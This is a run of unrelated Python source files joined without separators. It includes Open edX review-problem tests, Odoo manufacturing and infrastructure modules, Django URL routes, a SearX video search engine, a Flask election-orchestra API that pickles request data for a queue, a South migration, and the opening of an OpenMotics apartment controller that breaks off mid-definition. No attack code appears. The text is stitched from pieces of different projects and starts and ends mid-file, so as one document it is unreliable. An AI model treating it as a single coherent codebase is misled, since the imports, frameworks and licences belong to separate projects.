                             'Review Problem 4', 'Review Problem 5', 'Review Problem 6']

        self.assertIn(expected_header_text, response.content)
        self.assertEqual(response.content.count(expected_correctness_text), num_desired)
        # Since the problems are randomly selected, we have to check
        # the correct number of problems are returned.
        count = 0
        for problem in expected_problems:
            if problem in response.content:
                count += 1
        self.assertEqual(count, num_desired)
        self.assertEqual(response.content.count(self.URL_BEGINNING), num_desired)

    @ddt.data(2, 6)
    def test_review_problem_urls(self, num_desired):
        """
        Verify that the URLs returned from the Review xBlock are valid and
        correct URLs for the problems the learner has seen.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Loading problems so the learner has enough problems in the CSM
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section2_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section3_actual.location.name,
            }
        ))

        # get_review_ids reads the current user from crum rather than a
        # request object, so set it explicitly here.
        user = User.objects.get(email=self.STUDENTS[0]['email'])
        crum.set_current_user(user)
        result_urls = get_review_ids.get_problems(num_desired, self.course_actual.id)

        expected_urls = [
            (self.URL_BEGINNING + 'problem+block@Problem_1', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_2', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_3', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_4', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_5', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_6', True, 0)
        ]

        # Since the problems are randomly selected, we have to check
        # the correct number of urls are returned.
        count = 0
        for url in expected_urls:
            if url in result_urls:
                count += 1
        self.assertEqual(count, num_desired)

    @ddt.data(2, 5)
    def test_review_problem_urls_unique_problem(self, num_desired):
        """
        Verify that the URLs returned from the Review xBlock are valid and
        correct URLs for the problems the learner has seen. This test will give
        a unique problem to a learner and verify only that learner sees
        it as a review. It will also ensure that if a learner has not loaded a
        problem, it should never show up as a review problem
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Loading problems so the learner has enough problems in the CSM
        # (section 2 — and therefore Problem 5 — is deliberately NOT loaded)
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section3_actual.location.name,
            }
        ))

        user = User.objects.get(email=self.STUDENTS[0]['email'])
        crum.set_current_user(user)
        result_urls = get_review_ids.get_problems(num_desired, self.course_actual.id)

        expected_urls = [
            (self.URL_BEGINNING + 'problem+block@Problem_1', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_2', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_3', True, 0),
            (self.URL_BEGINNING + 'problem+block@Problem_4', True, 0),
            # This is the unique problem when num_desired == 5
            (self.URL_BEGINNING + 'problem+block@Problem_6', True, 0)
        ]
        expected_not_loaded_problem = (self.URL_BEGINNING + 'problem+block@Problem_5', True, 0)

        # Since the problems are randomly selected, we have to check
        # the correct number of urls are returned.
        count = 0
        for url in expected_urls:
            if url in result_urls:
                count += 1
        self.assertEqual(count, num_desired)
        self.assertNotIn(expected_not_loaded_problem, result_urls)

    # NOTE: This test is failing because when I grab the problem from the CSM,
    # it is unable to find its parents. This is some issue with the BlockStructure
    # and it not being populated the way we want. For now, this is being left out
    # since the first course I'm working with does not use this function.
    # TODO: Fix get_vertical from get_review_ids to have the block structure for this test
    # or fix something in this file to make sure it populates the block structure for the CSM
    @unittest.skip
    def test_review_vertical_url(self):
        """
        Verify that the URL returned from the Review xBlock is a valid and
        correct URL for the vertical the learner has seen.
        """
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_actual)
        self.enroll_student(self.STUDENTS[0]['email'], self.STUDENTS[0]['password'], self.course_review)

        # Loading problems so the learner has problems and thus a vertical in the CSM
        self.client.get(reverse(
            'courseware_section',
            kwargs={
                'course_id': self.course_actual.id,
                'chapter': self.chapter_actual.location.name,
                'section': self.section1_actual.location.name,
            }
        ))

        user = User.objects.get(email=self.STUDENTS[0]['email'])
        crum.set_current_user(user)
        result_url = get_review_ids.get_vertical(self.course_actual.id)

        expected_url = self.URL_BEGINNING + 'vertical+block@New_Unit_1'

        self.assertEqual(result_url, expected_url)

# -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)


import time
from datetime import datetime

import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP
from openerp.tools import float_compare
from openerp.tools.translate import _
from openerp import SUPERUSER_ID
from openerp import netsvc
from openerp import tools

class mrp_production(osv.osv):
    """Customization of mrp.production: productions without a BoM are allowed
    (lines computation skips them instead of failing, and such orders get a
    produce line when set to ready)."""
    _inherit = 'mrp.production'

    def _action_compute_lines(self, cr, uid, ids, properties=None, context=None):
        """ Computes bills of material of a product.
        @param properties: List containing dictionaries of properties.
        @return: product lines of the last processed production order.
        """
        if properties is None:
            properties = []
        results = []
        bom_obj = self.pool.get('mrp.bom')
        uom_obj = self.pool.get('product.uom')
        prod_line_obj = self.pool.get('mrp.production.product.line')
        workcenter_line_obj = self.pool.get('mrp.production.workcenter.line')
        for production in self.browse(cr, uid, ids):
            # unlink product_lines (as superuser: regular users may lack unlink rights)
            prod_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.product_lines], context=context)

            # unlink workcenter_lines
            workcenter_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.workcenter_lines], context=context)

            # search BoM structure and route
            bom_point = production.bom_id
            bom_id = production.bom_id.id
            if not bom_point:
                bom_id = bom_obj._bom_find(cr, uid, production.product_id.id, production.product_uom.id, properties)
                if bom_id:
                    bom_point = bom_obj.browse(cr, uid, bom_id)
                    routing_id = bom_point.routing_id.id or False
                    self.write(cr, uid, [production.id], {'bom_id': bom_id, 'routing_id': routing_id})

            if not bom_id:
                # Bug fix: this `continue` was indented with a tab inside
                # space-indented code (a TabError on Python 3). Productions
                # without a BoM are skipped instead of raising.
                continue

            # get components and workcenter_lines from BoM structure
            factor = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, bom_point.product_uom.id)
            res = bom_obj._bom_explode(cr, uid, bom_point, factor / bom_point.product_qty, properties, routing_id=production.routing_id.id)
            results = res[0]  # product_lines
            results2 = res[1]  # workcenter_lines

            # reset product_lines in production order
            for line in results:
                line['production_id'] = production.id
                prod_line_obj.create(cr, uid, line)

            # reset workcenter_lines in production order
            for line in results2:
                line['production_id'] = production.id
                workcenter_line_obj.create(cr, uid, line)
        return results

    def action_ready(self, cr, uid, ids, context=None):
        """ Changes the production state to Ready and location id of stock move.
        @return: True
        """
        move_obj = self.pool.get('stock.move')
        self.write(cr, uid, ids, {'state': 'ready'})

        for production in self.browse(cr, uid, ids, context=context):
            if not production.bom_id:
                # No BoM: create the produce move directly (the return value
                # of the original unused local assignment was dropped).
                self._make_production_produce_line(cr, uid, production, context=context)

        for (production_id, name) in self.name_get(cr, uid, ids):
            production = self.browse(cr, uid, production_id)
            if production.move_prod_id and production.move_prod_id.location_id.id != production.location_dest_id.id:
                move_obj.write(cr, uid, [production.move_prod_id.id],
                        {'location_id': production.location_dest_id.id})
        return True

    def action_produce(self, cr, uid, production_id, production_qty, production_mode, context=None):
        """For BoM-less productions still in 'ready', push the workflow to
        'button_produce' before delegating to the standard behaviour."""
        production = self.browse(cr, uid, production_id, context=context)
        if not production.bom_id and production.state == 'ready':
            wf_service = netsvc.LocalService("workflow")
            wf_service.trg_validate(uid, 'mrp.production', production_id, 'button_produce', cr)
        return super(mrp_production, self).action_produce(cr, uid, production_id, production_qty, production_mode, context=context)
mrp_production()

# ETConf -- web-based user-friendly computer hardware configurator
# Copyright (C) 2010-2011 ETegro Technologies, PLC <http://etegro.com/>
#                         Sergey Matveev <sergey.matveev@etegro.com>
# 
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
# 
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

from django.conf.urls.defaults import *

# URL routes for the configurator "giver" app, using the legacy
# django.conf.urls.defaults.patterns() API (removed in Django 1.8+): each
# tuple maps a regex with a `computermodel_alias` capture group to a view
# name in configurator.giver.views.
urlpatterns = patterns( "configurator.giver.views",
	( r"^perform/(?P<computermodel_alias>.+)/$", "perform" ),
	( r"^configurator/(?P<computermodel_alias>.+)/$", "configurator" ),
	( r"^computermodel/request/(?P<computermodel_alias>.+)$", "computermodel_request" ),
)

# -*- coding: utf-8 -*-
##############################################################################
#
#    Infrastructure
#    Copyright (C) 2014 Ingenieria ADHOC
#    No email
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################


import re
from openerp import netsvc
from openerp.osv import osv, fields

class database_type(osv.osv):
    """Configuration record describing a type of managed database: naming
    prefix, URL scheme, automatic drop/deactivation policies and suggested
    backup policies."""

    _name = 'infrastructure.database_type'
    _description = 'database_type'

    _columns = {
        'name': fields.char(string='Name', required=True),
        'prefix': fields.char(string='Prefix', required=True, size=4),
        'url_prefix': fields.char(string='URL Prefix'),
        'automatic_drop': fields.boolean(string='Automatic Drop'),
        'automatic_drop_days': fields.integer(string='Automatic Drop Days'),
        'protect_db': fields.boolean(string='Protect DBs?'),
        'color': fields.integer(string='Color'),
        # Label typo fixed: was 'Atumatic Deactivation?'
        'automatic_deactivation': fields.boolean(string='Automatic Deactivation?'),
        # Label fixed: was a copy-paste of 'Automatic Drop Days'
        'auto_deactivation_days': fields.integer(string='Automatic Deactivation Days'),
        'url_example': fields.char(string='URL Example'),
        'bd_name_example': fields.char(string='BD Name Example'),
        'db_back_up_policy_ids': fields.many2many('infrastructure.db_back_up_policy', 'infrastructure_database_type_ids_db_back_up_policy_ids_rel', 'database_type_id', 'db_back_up_policy_id', string='Suggested Backup Policies'),
    }

    _defaults = {
    }

    _constraints = [
    ]


database_type()

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:

# SPDX-License-Identifier: AGPL-3.0-or-later
"""
 SepiaSearch (Videos)
"""

from json import loads
from dateutil import parser, relativedelta
from urllib.parse import urlencode
from datetime import datetime

# about
about = {
    "website": 'https://sepiasearch.org',
    "wikidata_id": None,
    "official_api_documentation": "https://framagit.org/framasoft/peertube/search-index/-/tree/master/server/controllers/api",  # NOQA
    "use_official_api": True,
    "require_api_key": False,
    "results": 'JSON',
}

categories = ['videos']
paging = True
time_range_support = True
safesearch = True
supported_languages = [
    'en', 'fr', 'ja', 'eu', 'ca', 'cs', 'eo', 'el',
    'de', 'it', 'nl', 'es', 'oc', 'gd', 'zh', 'pt',
    'sv', 'pl', 'fi', 'ru'
]
base_url = 'https://sepiasearch.org/api/v1/search/videos'

safesearch_table = {
    0: 'both',
    1: 'false',
    2: 'false'
}

time_range_table = {
    'day': relativedelta.relativedelta(),
    'week': relativedelta.relativedelta(weeks=-1),
    'month': relativedelta.relativedelta(months=-1),
    'year': relativedelta.relativedelta(years=-1)
}


embedded_url = '<iframe width="540" height="304" src="{url}" frameborder="0" allowfullscreen></iframe>'


def minute_to_hm(minute):
    """Format a duration given in minutes as "H:MM".

    Returns None when *minute* is not an int (e.g. missing duration).
    """
    if not isinstance(minute, int):
        return None
    hours, mins = divmod(minute, 60)
    return "%d:%02d" % (hours, mins)


def request(query, params):
    """Build the SepiaSearch video-search URL into params['url'].

    Adds pagination, sorting and NSFW filtering; optionally restricts by
    UI language and by time range (as a 'startDate' lower bound).
    """
    query_args = {
        'search': query,
        'start': (params['pageno'] - 1) * 10,
        'count': 10,
        'sort': '-match',
        'nsfw': safesearch_table[params['safesearch']],
    }
    params['url'] = base_url + '?' + urlencode(query_args)

    lang = params['language'].split('-')[0]
    if lang in supported_languages:
        params['url'] += '&languageOneOf[]=' + lang

    if params['time_range'] in time_range_table:
        start = datetime.now().date() + time_range_table[params['time_range']]
        params['url'] += '&startDate=' + start.isoformat()

    return params


def response(resp):
    """Parse a SepiaSearch JSON reply into a list of searx video results."""
    payload = loads(resp.text)

    if 'data' not in payload:
        return []

    results = []
    for item in payload['data']:
        name = item['name']
        description = item['description']
        thumb = item['thumbnailUrl']
        published = parser.parse(item['publishedAt'])
        embedded = embedded_url.format(url=item.get('embedUrl'))
        account_name = item.get('account', {}).get('displayName')
        duration = minute_to_hm(item.get('duration'))
        link = item['url']

        results.append({
            'url': link,
            'title': name,
            'content': description,
            'author': account_name,
            'length': duration,
            'template': 'videos.html',
            'publishedDate': published,
            'embedded': embedded,
            'thumbnail': thumb,
        })

    return results

# -*- coding: utf-8 -*-

#
# SPDX-FileCopyrightText: 2013-2021 Agora Voting SL <contact@nvotes.com>
#
# SPDX-License-Identifier: AGPL-3.0-only
#
import pickle
import base64
import json
import re
from datetime import datetime

from flask import Blueprint, request, make_response, abort

from frestq.utils import loads, dumps
from frestq.tasks import SimpleTask, TaskError
from frestq.app import app, db

from models import Election, Authority, QueryQueue
from create_election.performer_jobs import check_election_data


from taskqueue import queue_task, apply_task, dequeue_task

public_api = Blueprint('public_api', __name__)

def error(status, message=""):
    """Return a flask response with HTTP *status*.

    The body is a JSON object {"message": ...} when *message* is non-empty,
    otherwise an empty body.
    """
    body = json.dumps({"message": message}) if message else ""
    return make_response(body, status)


@public_api.route('/dequeue', methods=['GET'])
def dequeue():
    """Trigger processing of the next queued task.

    Always answers 202; the body reports either {"status": "ok"} or the
    error message when dequeuing failed.
    """
    try:
        dequeue_task()
    except Exception as e:
        # Bug fix: Exception has no `.message` attribute on Python 3
        # (raised AttributeError here); str(e) works on both 2 and 3.
        return make_response(dumps(dict(status=str(e))), 202)

    return make_response(dumps(dict(status="ok")), 202)


@public_api.route('/election', methods=['POST'])
def post_election():
    '''
    POST /election

    Creates an election, with the given input data. This involves communicating
    with the different election authorities to generate the joint public key.

    Example request:
    POST /election
    {
      "id": 1110,
      "title": "Votación de candidatos",
      "description": "Selecciona los documentos polí­tico, ético y organizativo con los que Podemos",
      "director": "wadobo-auth1",
      "authorities": "openkratio-authority",
      "layout": "pcandidates-election",
      "presentation": {
        "share_text": "lo que sea",
        "theme": "foo",
        "urls": [
          {
            "title": "",
            "url": ""
          }
        ],
        "theme_css": "whatever"
      },
      "end_date": "2013-12-09T18:17:14.457000",
      "start_date": "2013-12-06T18:17:14.457000",
      "questions": [
          {
              "description": "",
              "layout": "pcandidates-election",
              "max": 1,
              "min": 0,
              "num_winners": 1,
              "title": "Secretarí­a General",
              "randomize_answer_order": true,
              "tally_type": "plurality-at-large",
              "answer_total_votes_percentage": "over-total-valid-votes",
              "answers": [
                {
                  "id": 0,
                  "category": "Equipo de Enfermeras",
                  "details": "",
                  "sort_order": 1,
                  "urls": [
                    {
                      "title": "",
                      "url": ""
                    }
                  ],
                  "text": "Fulanita de tal"
                }
              ]
          }
      ],
      "authorities": [
        {
          "name": "Asociación Sugus GNU/Linux",
          "orchestra_url": "https://sugus.eii.us.es/orchestra",
          "ssl_cert": "-----BEGIN CERTIFICATE-----\nMIIFATCCA+mgAwIBAgIQAOli4NZQEWpKZeYX25jjwDANBgkqhkiG9w0BAQUFADBz\n8YOltJ6QfO7jNHU9jh/AxeiRf6MibZn6fvBHvFCrVBvDD43M0gdhMkVEDVNkPaak\nC7AHA/waXZ2EwW57Chr2hlZWAkwkFvsWxNt9BgJAJJt4CIVhN/iau/SaXD0l0t1N\nT0ye54QPYl38Eumvc439Yd1CeVS/HYbP0ISIfpNkkFA5TiQdoA==\n-----END CERTIFICATE-----"
        },
        {
          "name": "Agora Ciudadana",
          "orchestra_url": "https://agoravoting.com:6874/orchestra",
          "ssl_cert": "-----BEGIN CERTIFICATE-----\nMIIFATCCA+mgAwIBAgIQAOli4NZQEWpKZeYX25jjwDANBgkqhkiG9w0BAQUFADBz\n8YOltJ6QfO7jNHU9jh/AxeiRf6MibZn6fvBHvFCrVBvDD43M0gdhMkVEDVNkPaak\nC7AHA/waXZ2EwW57Chr2hlZWAkwkFvsWxNt9BgJAJJt4CIVhN/iau/SaXD0l0t1N\nT0ye54QPYl38Eumvc439Yd1CeVS/HYbP0ISIfpNkkFA5TiQdoA==\n-----END CERTIFICATE-----"
        },
        {
          "name": "Wadobo Labs",
          "orchestra_url": "https://wadobo.com:6874/orchestra",
          "ssl_cert": "-----BEGIN CERTIFICATE-----\nMIIFATCCA+mgAwIBAgIQAOli4NZQEWpKZeYX25jjwDANBgkqhkiG9w0BAQUFADBz\n8YOltJ6QfO7jNHU9jh/AxeiRf6MibZn6fvBHvFCrVBvDD43M0gdhMkVEDVNkPaak\nC7AHA/waXZ2EwW57Chr2hlZWAkwkFvsWxNt9BgJAJJt4CIVhN/iau/SaXD0l0t1N\nT0ye54QPYl38Eumvc439Yd1CeVS/HYbP0ISIfpNkkFA5TiQdoA==\n-----END CERTIFICATE-----"
        }
      ]
    }


    On success, response is empty with status 202 Accepted and returns something
    like:

    {
        "task_id": "ba83ee09-aa83-1901-bb11-e645b52fc558",
    }
    When the election finally gets processed, the callback_url is called with a
    POST containing the protInfo.xml file generated jointly by each
    authority, following this example response:

    {
        "status": "finished",
        "reference": {
            "election_id": "d9e5ee09-03fa-4890-aa83-2fc558e645b5",
            "action": "POST /election"
        },
        "session_data": [{
            "session_id": "deadbeef-03fa-4890-aa83-2fc558e645b5",
            "publickey": ["<pubkey codified in hexadecimal>"]
        }]
    }

    Note that this protInfo.xml will contain the election public key, but
    also some other information. In particular, it's worth noting that
    the http and hint servers' urls for each authority could change later,
    if election-orchestra needs it.

    If there was an error, then the callback will be called following this
    example format:

    {
        "status": "error",
        "reference": {
            "session_id": "d9e5ee09-03fa-4890-aa83-2fc558e645b5",
            "action": "POST /election"
        },
        "data": {
            "message": "error message"
        }
    }
    '''

    # Parse the body leniently: returns None on malformed JSON instead of raising.
    data = request.get_json(force=True, silent=True)
    # NOTE(security): the payload is pickled and base64-encoded for storage in
    # the task queue; whatever later unpickles it must only accept trusted
    # queue entries, since pickle.loads executes arbitrary code.
    d = base64.b64encode(pickle.dumps(data)).decode('utf-8')
    queueid = queue_task(task='election', data=d)

    return make_response(dumps(dict(queue_id=queueid)), 202)


@public_api.route('/tally', methods=['POST'])
def post_tally():
    '''
    POST /tally

    Tallies an election, with the given input data. This involves communicating
    with the different election authorities to do the tally.

    Example request:
    POST /tally
    {
        "election_id": 111,
        "callback_url": "https://127.0.0.1:5000/public_api/receive_tally",
        "votes_url": "https://127.0.0.1:5000/public_data/vota4/encrypted_ciphertexts",
        "votes_hash": "ni:///sha-256;f4OxZX_x_FO5LcGBSKHWXfwtSx-j1ncoSt3SABJtkGk"
    }

    On success, response is empty with status 202 Accepted and returns something
    like:

    {
        "task_id": "ba83ee09-aa83-1901-bb11-e645b52fc558",
    }

    When the election finally gets processed, the callback_url is called with POST
    similar to the following example:

    {
        "status": "finished",
        "reference": {
            "election_id": "d9e5ee09-03fa-4890-aa83-2fc558e645b5",
            "action": "POST /tally"
        },
        "data": {
            "votes_url": "https://127.0.0.1:5000/public_data/vota4/tally.tar.bz2",
            "votes_hash": "ni:///sha-256;f4OxZX_x_FO5LcGBSKHWXfwtSx-j1ncoSt3SABJtkGk"
        }
    }

    If there was an error, then the callback will be called following this
    example format:

    {
        "status": "error",
        "reference": {
            "election_id": "d9e5ee09-03fa-4890-aa83-2fc558e645b5",
            "action": "POST /tally"
        },
        "data": {
            "message": "error message"
        }
    }
    '''

    # first of all, parse input data (leniently: None on malformed JSON)
    data = request.get_json(force=True, silent=True)
    # NOTE(security): payload is pickled for queue storage — see post_election.
    d = base64.b64encode(pickle.dumps(data)).decode('utf-8')
    queueid = queue_task(task='tally', data=d)
    return make_response(dumps(dict(queue_id=queueid)), 202)

@public_api.route('/receive_election', methods=['POST'])
def receive_election():
    '''
    This is a test route to be able to test that callbacks are correctly sent
    '''
    payload = request.get_json(force=True, silent=True)
    print("ATTENTION received election callback: ")
    print(payload)
    return make_response("", 202)


@public_api.route('/receive_tally', methods=['POST'])
def receive_tally():
    '''
    This is a test route to be able to test that callbacks are correctly sent
    '''
    payload = request.get_json(force=True, silent=True)
    print("ATTENTION received tally callback: ")
    print(payload)
    return make_response("", 202)

# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """South schema migration: adds the boolean ``drive_auth`` column
    (default False) to the ``user_project`` table (UserProject model)."""

    def forwards(self, orm):
        """Apply the migration."""
        # Adding field 'UserProject.drive_auth'
        db.add_column(u'user_project', 'drive_auth',
                      self.gf('django.db.models.fields.BooleanField')(default=False),
                      keep_default=False)


    def backwards(self, orm):
        """Revert the migration."""
        # Deleting field 'UserProject.drive_auth'
        db.delete_column(u'user_project', 'drive_auth')


    # Frozen ORM snapshot generated by South; do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'home.category': {
            'Meta': {'object_name': 'Category', 'db_table': "u'category'"},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '150'})
        },
        'projects.project': {
            'Meta': {'object_name': 'Project', 'db_table': "u'project'"},
            'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['home.Category']", 'null': 'True', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'image_original_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'licence': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'tags': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'type_field': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'db_column': "'type'", 'blank': 'True'})
        },
        'projects.projectpart': {
            'Meta': {'object_name': 'ProjectPart', 'db_table': "u'project_part'"},
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'created_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projectpart_created_user'", 'to': "orm['auth.User']"}),
            'drive_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'modified_user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'projectpart_modified_user'", 'null': 'True', 'to': "orm['auth.User']"}),
            'order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['projects.Project']"}),
            'project_part': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['projects.ProjectPart']", 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'projects.userproject': {
            'Meta': {'object_name': 'UserProject', 'db_table': "u'user_project'"},
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 27, 0, 0)', 'null': 'True', 'blank': 'True'}),
            'created_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userproject_created_user'", 'to': "orm['auth.User']"}),
            'drive_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'modified_user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'userproject_modified_user'", 'null': 'True', 'to': "orm['auth.User']"}),
            'permission': ('django.db.models.fields.CharField', [], {'default': '0', 'max_length': '255'}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['projects.Project']", 'db_column': "'project_id'"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        }
    }

    complete_apps = ['projects']
# Copyright (C) 2021 OpenMotics BV
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
apartment controller manages the apartment objects that are known in the system
"""
import logging

from gateway.events import EsafeEvent, EventError
from gateway.exceptions import ItemDoesNotExistException, StateException
from gateway.models import Apartment, Database
from gateway.mappers import ApartmentMapper
from gateway.dto import ApartmentDTO
from gateway.pubsub import PubSub
from ioc import INJECTED, Inject, Injectable, Singleton

if False:  # MyPy
    from typing import List, Optional, Dict, Any
    from esafe.rebus import RebusController

logger = logging.getLogger(__name__)


@Injectable.named('apartment_controller')
@Singleton
class ApartmentController(object):
    """Manages Apartment ORM objects: load/save/update/delete, with rebus
    device-id validation (via an optional RebusController) and CONFIG_CHANGE
    pubsub events on mutations."""

    def __init__(self):
